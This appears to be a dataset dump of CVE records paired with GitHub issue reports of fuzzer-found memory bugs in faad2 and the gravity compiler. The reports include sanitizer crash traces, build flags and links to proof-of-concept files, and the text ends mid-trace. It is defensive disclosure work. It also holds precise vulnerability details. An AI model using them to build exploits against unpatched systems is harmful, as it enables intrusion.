## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-shared=no ## Command line ./frontend/faad -w -b 5 @@ ## AddressSanitizer output ``` NULL 349.611 secs, 7 ch, 24000 Hz ================================================================= ==73167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x620000004f80 at pc 0x0000005df054 bp 0x7fffad795310 sp 0x7fffad795308 READ of size 4 at 0x620000004f80 thread T0 #0 0x5df053 in sbr_qmf_analysis_32 /home/seviezhou/faad2/libfaad/sbr_qmf.c:96:77 #1 0x598dc5 in sbr_process_channel /home/seviezhou/faad2/libfaad/sbr_dec.c #2 0x59addc in sbrDecodeSingleFrame /home/seviezhou/faad2/libfaad/sbr_dec.c:562:17 #3 0x5c2f81 in reconstruct_single_channel /home/seviezhou/faad2/libfaad/specrec.c:1070:22 #4 0x556c2e in single_lfe_channel_element /home/seviezhou/faad2/libfaad/syntax.c:643:14 #5 0x556c2e in decode_sce_lfe /home/seviezhou/faad2/libfaad/syntax.c:357 #6 0x555c2b in raw_data_block /home/seviezhou/faad2/libfaad/syntax.c:565:13 #7 0x5389de in aac_frame_decode /home/seviezhou/faad2/libfaad/decoder.c:990:9 #8 0x52f738 in decodeMP4file /home/seviezhou/faad2/frontend/main.c:916:25 #9 0x52f738 in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #10 0x7f2790ec683f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x41a698 in _start (/home/seviezhou/faad2/frontend/faad+0x41a698) 0x620000004f80 is located 0 bytes to the right of 3840-byte region [0x620000004080,0x620000004f80) allocated by thread T0 here: #0 0x4de8a8 in __interceptor_malloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88 #1 0x5c1a0b in allocate_single_channel /home/seviezhou/faad2/libfaad/specrec.c:736:48 #2 0x5c1a0b in reconstruct_single_channel /home/seviezhou/faad2/libfaad/specrec.c:934 #3 0x556c2e in single_lfe_channel_element /home/seviezhou/faad2/libfaad/syntax.c:643:14 #4 0x556c2e in decode_sce_lfe /home/seviezhou/faad2/libfaad/syntax.c:357 #5 0x555c2b in raw_data_block /home/seviezhou/faad2/libfaad/syntax.c:565:13 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/faad2/libfaad/sbr_qmf.c:96:77 in sbr_qmf_analysis_32 Shadow bytes around the buggy address: 0x0c407fff89a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff89b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff89c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff89d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff89e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c407fff89f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff8a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==73167==ABORTING ``` ## POC [sbr_qmf_analysis_32-sbr_qmf-96.zip](https://github.com/knik0/faad2/files/5147035/sbr_qmf_analysis_32-sbr_qmf-96.zip)
A heap-buffer-overflow in sbr_qmf.c:96:77
https://api.github.com/repos/knik0/faad2/issues/59/comments
0
2020-08-30T15:32:46Z
2020-10-06T04:45:45Z
https://github.com/knik0/faad2/issues/59
688,739,598
59
2,522
CVE-2021-32278
2021-09-20T16:15:10.413
An issue was discovered in faad2 through 2.10.0. A heap-buffer-overflow exists in the function lt_prediction located in lt_predict.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/62" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/62" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faad2_project:faad2:*:*:*:*:*:*:*:*", "matchCriteriaId": "473E94D7-49A2-4FA4-82CD-726B2B84FF95", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/knik0/faad2/issues/62
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "knik0", "faad2" ]
## System info Ubuntu x86_64, clang 6.0, faad (latest master [f71b5e](https://github.com/knik0/faad2/commit/f71b5e81f563d94fa284977a326520d269d8353e)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-shared=no ## Command line ./frontend/faad -w -b 5 @@ ## AddressSanitizer output ``` ================================================================= ==13979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x620000003006 at pc 0x0000005e1605 bp 0x7ffc00e45c30 sp 0x7ffc00e45c28 READ of size 2 at 0x620000003006 thread T0 #0 0x5e1604 in lt_prediction /home/seviezhou/faad2/libfaad/lt_predict.c:108:36 #1 0x5be727 in reconstruct_single_channel /home/seviezhou/faad2/libfaad/specrec.c:995:9 #2 0x55308e in single_lfe_channel_element /home/seviezhou/faad2/libfaad/syntax.c:643:14 #3 0x55308e in decode_sce_lfe /home/seviezhou/faad2/libfaad/syntax.c:357 #4 0x551d9a in raw_data_block /home/seviezhou/faad2/libfaad/syntax.c:550:13 #5 0x534e1e in aac_frame_decode /home/seviezhou/faad2/libfaad/decoder.c:990:9 #6 0x52bbeb in decodeMP4file /home/seviezhou/faad2/frontend/main.c:916:25 #7 0x52bbeb in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #8 0x7f3ce6cebb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41a669 in _start (/home/seviezhou/faad2/frontend/faad+0x41a669) 0x620000003006 is located 122 bytes to the left of 3840-byte region [0x620000003080,0x620000003f80) allocated by thread T0 here: #0 0x4da520 in __interceptor_malloc (/home/seviezhou/faad2/frontend/faad+0x4da520) #1 0x5bdc3e in allocate_single_channel /home/seviezhou/faad2/libfaad/specrec.c:714:53 #2 0x5bdc3e in reconstruct_single_channel /home/seviezhou/faad2/libfaad/specrec.c:934 #3 0x55308e in single_lfe_channel_element /home/seviezhou/faad2/libfaad/syntax.c:643:14 #4 0x55308e in decode_sce_lfe /home/seviezhou/faad2/libfaad/syntax.c:357 #5 0x551d9a in raw_data_block /home/seviezhou/faad2/libfaad/syntax.c:550:13 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/faad2/libfaad/lt_predict.c:108:36 in lt_prediction Shadow bytes around the buggy address: 0x0c407fff85b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff85e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c407fff8600:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c407fff8610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff8620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff8630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff8640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c407fff8650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==13979==ABORTING ``` ## POC [heap-overflow-lt_prediction-lt_predict-108.zip](https://github.com/knik0/faad2/files/5175518/heap-overflow-lt_prediction-lt_predict-108.zip)
A heap-buffer-overflow in lt_predict.c:108:36
https://api.github.com/repos/knik0/faad2/issues/62/comments
0
2020-09-04T14:47:28Z
2020-10-06T04:45:45Z
https://github.com/knik0/faad2/issues/62
693,250,265
62
2,523
CVE-2021-32281
2021-09-20T16:15:10.517
An issue was discovered in gravity through 0.8.1. A heap-buffer-overflow exists in the function gnode_function_add_upvalue located in gravity_ast.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/313" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/313" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creolabs:gravity:*:*:*:*:*:*:*:*", "matchCriteriaId": "B07F7D2C-1B83-4D51-89BE-CDDCD836BA20", "versionEndExcluding": null, "versionEndIncluding": "0.8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/marcobambini/gravity/issues/313
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marcobambini", "gravity" ]
## System info Ubuntu x86_64, clang 6.0, gravity (latest master [ecbee9f](https://github.com/marcobambini/gravity/commit/ecbee9f06e0168b17ddb953fb08adb4b9bb19fca)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/gravity -o /tmp/grav -q -c @@ ## Output ``` WARNING ERROR on 0 (1,1): Unknown macro token. Declaration will be ignored. SEMANTIC ERROR on 0 (1,39): Identifier resudb not found. *** Error in `./build/gravity': free(): invalid next size (fast): 0x0000000001b32470 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777f5)[0x7f17e014d7f5] /lib/x86_64-linux-gnu/libc.so.6(+0x8038a)[0x7f17e015638a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f17e015a58c] ./build/gravity[0x4602a0] ./build/gravity(gvisit+0x1c6)[0x41c8a2] ./build/gravity[0x45fed0] ./build/gravity[0x4601da] ./build/gravity(gvisit+0x222)[0x41c8fe] ./build/gravity[0x45fb58] ./build/gravity(gvisit+0xb2)[0x41c78e] ./build/gravity[0x460038] ./build/gravity(gvisit+0x1f4)[0x41c8d0] ./build/gravity[0x4605be] ./build/gravity(gvisit+0x2be)[0x41c99a] ./build/gravity[0x45fa35] ./build/gravity(gvisit+0x84)[0x41c760] ./build/gravity(gnode_free+0x103)[0x460e31] ./build/gravity[0x40926e] ./build/gravity(gravity_compiler_run+0x223)[0x4096ae] ./build/gravity(main+0x26b)[0x408c43] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f17e00f6840] ./build/gravity(_start+0x29)[0x407af9] ======= Memory map: ======== 00400000-0047d000 r-xp 00000000 08:11 4598269 /home/seviezhou/gravity/build/gravity 0067c000-0067d000 r--p 0007c000 08:11 4598269 /home/seviezhou/gravity/build/gravity 0067d000-0067e000 rw-p 0007d000 08:11 4598269 /home/seviezhou/gravity/build/gravity 0067e000-0067f000 rw-p 00000000 00:00 0 01b10000-01b52000 rw-p 00000000 00:00 0 [heap] 7f17dbde8000-7f17dbdff000 r-xp 00000000 08:02 12582916 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f17dbdff000-7f17dbffe000 ---p 00017000 08:02 12582916 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f17dbffe000-7f17dbfff000 r--p 00016000 08:02 12582916 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f17dbfff000-7f17dc000000 rw-p 00017000 08:02 12582916 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f17dc000000-7f17dc021000 rw-p 00000000 00:00 0 7f17dc021000-7f17e0000000 ---p 00000000 00:00 0 7f17e00d6000-7f17e0296000 r-xp 00000000 08:02 12582935 /lib/x86_64-linux-gnu/libc-2.23.so 7f17e0296000-7f17e0496000 ---p 001c0000 08:02 12582935 /lib/x86_64-linux-gnu/libc-2.23.so 7f17e0496000-7f17e049a000 r--p 001c0000 08:02 12582935 /lib/x86_64-linux-gnu/libc-2.23.so 7f17e049a000-7f17e049c000 rw-p 001c4000 08:02 12582935 /lib/x86_64-linux-gnu/libc-2.23.so 7f17e049c000-7f17e04a0000 rw-p 00000000 00:00 0 7f17e04a0000-7f17e05a8000 r-xp 00000000 08:02 12582941 /lib/x86_64-linux-gnu/libm-2.23.so 7f17e05a8000-7f17e07a7000 ---p 00108000 08:02 12582941 /lib/x86_64-linux-gnu/libm-2.23.so 7f17e07a7000-7f17e07a8000 r--p 00107000 08:02 12582941 /lib/x86_64-linux-gnu/libm-2.23.so 7f17e07a8000-7f17e07a9000 rw-p 00108000 08:02 12582941 /lib/x86_64-linux-gnu/libm-2.23.so 7f17e07a9000-7f17e07cf000 r-xp 00000000 08:02 12582973 /lib/x86_64-linux-gnu/ld-2.23.so 7f17e099d000-7f17e09a1000 rw-p 00000000 00:00 0 7f17e09cd000-7f17e09ce000 rw-p 00000000 00:00 0 7f17e09ce000-7f17e09cf000 r--p 00025000 08:02 12582973 /lib/x86_64-linux-gnu/ld-2.23.so 7f17e09cf000-7f17e09d0000 rw-p 00026000 08:02 12582973 /lib/x86_64-linux-gnu/ld-2.23.so 7f17e09d0000-7f17e09d1000 rw-p 00000000 00:00 0 7ffd38896000-7ffd388b7000 rw-p 00000000 00:00 0 [stack] 7ffd3899f000-7ffd389a1000 r--p 00000000 00:00 0 [vvar] 7ffd389a1000-7ffd389a3000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Aborted seviezhou@ubun ``` ## AddressSanitizer output ``` ================================================================= ==76343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000041c at pc 0x00000060c196 bp 0x7fffdcef1f40 sp 0x7fffdcef1f38 READ of size 2 at 0x60b00000041c thread T0 #0 0x60c195 in gnode_function_add_upvalue /home/seviezhou/gravity/src/compiler/gravity_ast.c:90:41 #1 0x55cef2 in lookup_identifier /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:239:21 #2 0x557feb in visit_identifier_expr /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:1156:23 #3 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #4 0x5520a8 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:750:17 #5 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #6 0x552bb6 in visit_variable_decl /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:793:22 #7 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #8 0x54e2e7 in visit_compound_stmt /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:565:5 #9 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #10 0x5520a8 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:750:17 #11 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #12 0x552bb6 in visit_variable_decl /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:793:22 #13 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #14 0x5520a8 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:750:17 #15 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #16 0x556481 in visit_binary_expr /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:957:5 #17 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #18 0x5520a8 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:750:17 #19 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #20 0x556481 in visit_binary_expr /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:957:5 #21 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #22 0x54dcf7 in visit_list_stmt /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:553:5 #23 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #24 0x54d6a5 in gravity_semacheck2 /home/seviezhou/gravity/src/compiler/gravity_semacheck2.c:1237:5 #25 0x5221d6 in gravity_compiler_run /home/seviezhou/gravity/src/compiler/gravity_compiler.c:171:15 #26 0x51e766 in main /home/seviezhou/gravity/src/cli/gravity.c:456:19 #27 0x7f6e049cd83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #28 0x4217a8 in _start (/home/seviezhou/gravity/build/gravity+0x4217a8) 0x60b00000041c is located 4 bytes to the right of 104-byte region [0x60b0000003b0,0x60b000000418) allocated by thread T0 here: #0 0x4e5bd0 in calloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:97 #1 0x5d0f41 in gravity_calloc /home/seviezhou/gravity/src/shared/gravity_memory.c:19:12 #2 0x53fe30 in parse_enum_declaration /home/seviezhou/gravity/src/compiler/gravity_parser.c:1443:52 #3 0x53fe30 in parse_declaration_statement /home/seviezhou/gravity/src/compiler/gravity_parser.c:2362 #4 0x53d474 in parse_statement /home/seviezhou/gravity/src/compiler/gravity_parser.c:2504:59 #5 0x53ba6c in parse_compound_statement /home/seviezhou/gravity/src/compiler/gravity_parser.c:2309:25 #6 0x539c11 in parse_function /home/seviezhou/gravity/src/compiler/gravity_parser.c:300:63 #7 0x53669f in parse_precedence /home/seviezhou/gravity/src/compiler/gravity_parser.c:1059:32 #8 0x534617 in parse_infix /home/seviezhou/gravity/src/compiler/gravity_parser.c:1114:22 #9 0x5368ec in parse_precedence /home/seviezhou/gravity/src/compiler/gravity_parser.c:1080:16 #10 0x53dec2 in parse_expression /home/seviezhou/gravity/src/compiler/gravity_parser.c:1092:12 #11 0x53dec2 in parse_expression_statement /home/seviezhou/gravity/src/compiler/gravity_parser.c:2477 #12 0x53dec2 in parse_statement /home/seviezhou/gravity/src/compiler/gravity_parser.c:2510 #13 0x52cfbf in parser_run /home/seviezhou/gravity/src/compiler/gravity_parser.c:2575:29 #14 0x52cfbf in gravity_parser_run /home/seviezhou/gravity/src/compiler/gravity_parser.c:2658 #15 0x5220e9 in gravity_compiler_run /home/seviezhou/gravity/src/compiler/gravity_compiler.c:161:21 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/gravity/src/compiler/gravity_ast.c:90:41 in gnode_function_add_upvalue Shadow bytes around the buggy address: 0x0c167fff8030: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff8040: 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 00 00 0x0c167fff8050: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c167fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa 0x0c167fff8070: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00 =>0x0c167fff8080: 00 00 00[fa]fa fa fa fa fa fa fa fa 00 00 00 00 0x0c167fff8090: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa 0x0c167fff80a0: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff80b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c167fff80c0: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c167fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==76343==ABORTING ``` ## POC [heap-overflow-gnode_function_add_upvalue-gravity_ast-90.zip](https://github.com/marcobambini/gravity/files/5039399/heap-overflow-gnode_function_add_upvalue-gravity_ast-90.zip)
A heap-buffer-overflow in gravity_ast.c:90:41 can cause abort
https://api.github.com/repos/marcobambini/gravity/issues/313/comments
1
2020-08-07T04:58:06Z
2020-08-31T08:19:43Z
https://github.com/marcobambini/gravity/issues/313
674,757,661
313
2,524
CVE-2021-32282
2021-09-20T16:15:10.563
An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function ircode_add_check() located in gravity_ircode.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/315" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marcobambini/gravity/issues/315" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creolabs:gravity:*:*:*:*:*:*:*:*", "matchCriteriaId": "B07F7D2C-1B83-4D51-89BE-CDDCD836BA20", "versionEndExcluding": null, "versionEndIncluding": "0.8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/marcobambini/gravity/issues/315
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marcobambini", "gravity" ]
## System info Ubuntu x86_64, clang 6.0, gravity (latest master [ecbee9f](https://github.com/marcobambini/gravity/commit/ecbee9f06e0168b17ddb953fb08adb4b9bb19fca)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/gravity -o /tmp/grav -q -c @@ ## Output ``` Segmentation fault ``` ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==37643==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006321dd bp 0x617000000400 sp 0x7fff9ce94610 T0) ==37643==The signal is caused by a READ memory access. ==37643==Hint: address points to the zero page. #0 0x6321dc in ircode_add_check /home/seviezhou/gravity/src/compiler/gravity_ircode.c:428:20 #1 0x6213cd in visit_binary_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1281:9 #2 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #3 0x61dc28 in visit_function_decl /home/seviezhou/gravity/src/compiler/gravity_codegen.c:994:9 #4 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #5 0x626eca in visit_postfix_expr /home/seviezhou/gravity/src/compiler/gravity_codegen.c:1571:13 #6 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #7 0x618357 in visit_list_stmt /home/seviezhou/gravity/src/compiler/gravity_codegen.c:364:5 #8 0x563b63 in gvisit /home/seviezhou/gravity/src/compiler/gravity_visitor.c #9 0x617b08 in gravity_codegen /home/seviezhou/gravity/src/compiler/gravity_codegen.c:2042:5 #10 0x522249 in gravity_compiler_run /home/seviezhou/gravity/src/compiler/gravity_compiler.c:175:26 #11 0x51e766 in main /home/seviezhou/gravity/src/cli/gravity.c:456:19 #12 0x7fdcbbe2b83f in __libc_start_main 